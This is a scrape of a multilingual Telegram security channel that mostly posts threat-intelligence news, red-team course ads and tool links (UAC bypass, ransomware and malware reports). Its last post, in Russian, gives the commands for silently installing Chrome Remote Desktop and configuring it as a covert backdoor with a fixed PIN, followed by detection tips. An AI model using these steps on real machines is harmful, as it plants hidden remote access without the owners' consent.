Source Byte – Telegram
Source Byte
7.73K subscribers
846 photos
73 videos
678 files
1.68K links
هشیار کسی باید کز عشق بپرهیزد
وین طبع که من دارم با عقل نیامیزد
Saadi Shirazi 187
Download Telegram
Source Byte
sepah bank.png
this report is bullshit or is related to past incidents (attacker targeted storage itself directly)

here is statement of the Datin company :

(source : https://www.dotin.ir/dotin-actions-with-banks-recent-cyberattack/)
👾21👍1
Demystifying Firmware Blobs in Linux
Posted Jul 5, 2025 Updated Jul 5, 2025
By Iman Seyed


Most Linux systems rely on binary blobs to activate the full capabilities of hardware like Bluetooth and Wi-Fi chips. But what are these blobs, and how does the kernel load them?
🔥21
Forwarded from SoheilSec (Soheil)
RTO.pdf
96.2 KB
دوره RTO
شروع دوره 17 مرداد مدت زمان دوره در 4 جلسه 8 ساعته که کلا 32 ساعت روزهای برگزاری جمعه ها 8 تا 16
دوره به صورت آنلاین می‌باشد. در صورتی که سرفصل تکمیل نشود تایم اضافه خواهد شد.
دوره به صورت عملی با سناریو شبیه سازی APT بر روی LAB شخصی سازی شده می‌باشد.
سرفصل ضمیمه شد هر روز شامل چندین موضوع می‌باشد که همراه با حل تمرین در لب می‌باشد.
قیمت دوره 15 تومن
نمونه تدریس
https://www.youtube.com/@soheilsec/playlists

سوال در مورد دوره @soheilsec
4
Forwarded from K4YT3X's Channel (K4YT3X)
发了一个新版本 (1.1.0),这个版本:

- 把注入换成 DLL 了方便塞进更多逻辑
- 添加了随机窗口标签的功能
- 添加了隐藏 Evanesco 自己窗口的功能
- 设置窗口
- 修复了显示窗口的时候会把用户看不到的窗口也显示出来的问题
- 做了个 Wnidows 安装包方便安装

https://github.com/k4yt3x/Evanesco/releases/tag/1.1.0
👍32
Forwarded from OS Internals (Abolfazl Kazemi)
🔍 قابل توجه علاقه‌مندان به امنیت سیستم‌عامل و توسعه اکسپلویت در لینوکس

من همیشه به تدریس علاقه‌مند بوده‌ام؛ نه صرفاً آموزش تئوری، بلکه انتقال واقعی تجربه‌ها و درک عمیق مفاهیم فنی. از سال‌ها پیش، تمرکزم روی internal سیستم‌عامل‌ها—به‌ویژه ویندوز و لینوکس—و مباحث امنیتی بوده و سعی کرده‌ام این مطالب تخصصی را به زبانی ساده، کاربردی و قابل‌فهم برای دیگران ارائه دهم.

🎓 حالا نوبت یک قدم جدید و متفاوت رسیده:
«دوره‌ی Exploit Development در لینوکس»
از تحلیل آسیب‌پذیری‌ واقعی گرفته تا نوشتن اکسپلویت‌های عملی و کاربردی.

اما تصمیم گرفتم یک شرط خاص برای انتشار این دوره بگذارم:
🎯 اگر اعضای کانالم به ۵۰۰۰ نفر برسند، دوره را به صورت کامل و رایگان منتشر می‌کنم.

بیش از ۲۰ ساعت ویدئو و تمرین عملی بدون تبلیغات، بدون پرداخت هزینه—صرفاً برای این‌که دانش تخصصی، راحت‌تر و بی‌واسطه به دست کسانی برسه که واقعاً به یادگیری اهمیت می‌دن.

🧠 اگر شما هم به این مسیر علاقه‌مندید یا فکر می‌کنید افراد دیگری در اطرافتان هستند که این محتوا به دردشان می‌خورد، خوشحال می‌شم با معرفی کانالم به دوستان‌تان از این پروژه حمایت کنید.

📎 لینک کانال:
https://news.1rj.ru/str/OxAA55

✍️راستی سرفصل دوره رو هم می‌تونید در لینک زیر مشاهده کنید:
https://news.1rj.ru/str/OxAA55/140
3🗿3
Forwarded from Sec Note
Red Team Tactics: Writing Windows Kernel Drivers for Advanced Persistence (Part 1)

Red Team Tactics: Writing Windows Kernel Drivers for Advanced Persistence (Part 2)

This post, as indicated by the noscript, will cover the topic of writing Windows kernel drivers for advanced persistence. Because the subject matter is relatively complex, I have decided to divide the project into a three or a four part series. This being the first post in the series, it will cover the fundamental information you need to know to get started with kernel development. This includes setting up a development environment, configuring remote kernel debugging and writing your first “Hello World” driver.
4
Forwarded from K4YT3X's Channel (K4YT3X)
Binja 啥时候加了 pseudo rust,真意外
🤯1
K4YT3X's Channel
Binja 啥时候加了 pseudo rust,真意外
This media is not supported in your browser
VIEW IN TELEGRAM
😁91
Forwarded from SoheilSec (Soheil)
Iran CTI Report-War Time.pdf
1.6 MB
👎82👍1
UAC-0001 cyberattacks on the security and defense sector using the LAMEHUG software tool using the LLM (Large Language Model) (CERT-UA#16039)

https://cert.gov.ua/article/6284730

#LAMEHUG , #apt28
Closing the Execution Gap.pdf
2.2 MB
Hardware-Backed Telemetry for Detecting Out-Of-Context Execution



https://www.preludesecurity.com/runtime-memory-protection
5🗿3
Forwarded from Sec Note
UACMe

Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor. This project demonstrates various UAC bypass techniques and serves as an educational resource for understanding Windows security mechanisms.



#uac_bypass
🔥7
Pay2Key: A New Player in the RaaS Market with an Eye on Russia

Threat Intelligence F6 analysts have studied the Pay2Key ransomware service, which has been distributed on Russian-language cybercriminal forums using the RaaS model since late February 2025.
2
Im_in_your_logs.pdf
29.1 MB
Black Hat USA 2025:
"I'm in Your Logs Now, Deceiving Your Analysts and Blinding Your EDR".



A comprehensive ETW event generation tool
4
Offensive Security & Red Teaming Labs and Projects

Bitnet-labs

Personal Red Team and Offensive Security labs, exercises, and projects.
This repository documents my journey to become an Offensive Security professional and Red Teamer
🤔1
Forwarded from Coinicap
❄️ بلوکه شدن بیش از 28 میلیون دلار دیگر
🔸بنیاد تتر در 26 جولای، بیش از 28 میلیون دلار دارایی تتر را فریز و والت‌های مربوطه را در لیست سیاه خود قرار می داده است.
🔸بررسی ما مشخص کرد که این والت‌ها با احتمال بسیار بالا برای یک سکوی ایرانی بوده اما نمی‌توان با قطعیت گفت کدام سکو و پلتفرم ایرانی این دارایی ها را از دست داده است. حجم واریزی‌ها از صرافی نوبیتکس به این والت‌ها، احتمال اینکه این والت‌ها برای صرافی نوبیتکس باشد را بسیار پایین آورده و تقریبا رد می کند.

🥶 در مجموع بیش ار 50 میلیون دلار دارایی بلوکه شده توسط بنیاد تتر مرتبط با پروژه های ایرانی شناسایی شده است. برخی از این والت‌ها نیز با صرافی‌های متمرکز خارجی مانند بایننس در ارتباط بوده‌اند که احتمالا آنها نیز در صرافی بلوکه و یا در والت‌های ناشناس، فلگ یا فریز شده‌اند.

برخی آدرس والت های فریز شده:

TBJT9BP7cM5yYne9kTdf2HNu9mX1WpRQpt
TGuqbYqJ4m1J8dKWB3NVnsuXtgXCQkgdyf
TTc6TVtmRUpYR9fhZeixsNkJuCMRzFqfcb
👍2🔥2😁1
XWorm V6: Advanced Evasion and AMSI Bypass Capabilities Revealed

Why do these malware samples exhibit such a basic design? 🫥
3😁2
🧪 Abusing Chrome Remote Desktop (CRD) for Covert Access
💻 Red Team tool или вектор для APT?

Chrome Remote Desktop (CRD) — легитимный инструмент от Google, позволяющий управлять системой через веб-интерфейс. Но при грамотной установке и конфигурации он превращается в удобный бекдор: скрытный, устойчивый, шифрованный и легитимный.

⚙️ Этапы эксплуатации (Red Team-практика)

📥 Скачивание инсталлятора
Переход на remotedesktop.google.com → загрузка .msi через Set up via SSH.

📦 Установка на жертве

msiexec /i chromeremotedesktophost.msi /qn


Требуются локальные админ-права.

🌐 Авторизация через Google-аккаунт
В браузере запускается мастер CRD.
После авторизации система выдаёт команду настройки подключения с OAuth-кодом.

🛠️ Обход GUI через undocumented флаг
Чтобы избежать необходимости ручного ввода PIN через GUI:

remoting_start_host.exe --code="TOKEN" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=%COMPUTERNAME% --pin=123456


Ключ --pin= не задокументирован, но работает (≥ 6 цифр).

📡 Подключение

После запуска команды хост появится в веб-интерфейсе CRD.

Подключение через браузер: ввод PIN → полный GUI-доступ.

Импакт
🔹 Устойчивый доступ (если настроен unattended mode)
🔹 Полноценный GUI
🔹 трафик — уходит в Google
🔹 Низкая видимость: всё работает внутри chrome.exe, без .exe из сторонних RAT'ов
🔹 Отсутствие необходимости в порт-форвардинге / firewall-обходе

🛡️ Detection / Hunting
- Установка Chrome Remote Desktop Host:
%ProgramFiles(x86)%\Google\Chrome Remote Desktop\
- Службы: remoting_host.exe
- Планировщик задач: chromeremotedesktophost
- Нетипичный трафик к:
remotedesktop-pa.googleapis.com
relay.mtls.sandbox.googleapis.com
- Поведенческий анализ chrome.exe с GUI-доступом в off-hours

📍Вывод: техника идеально вписывается в APT / Red Team TTPs. CRD — малозаметный способ удалённого управления, особенно актуален при наличии EDR, блокирующего кастомный RAT. Рекомендуется whitelist-контроль (AppLocker, WDAC) и мониторинг установки CRD в инфраструктуре.

🔗https://trustedsec.com/blog/abusing-chrome-remote-desktop-on-red-team-operations-a-practical-guide
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
4👍1😁1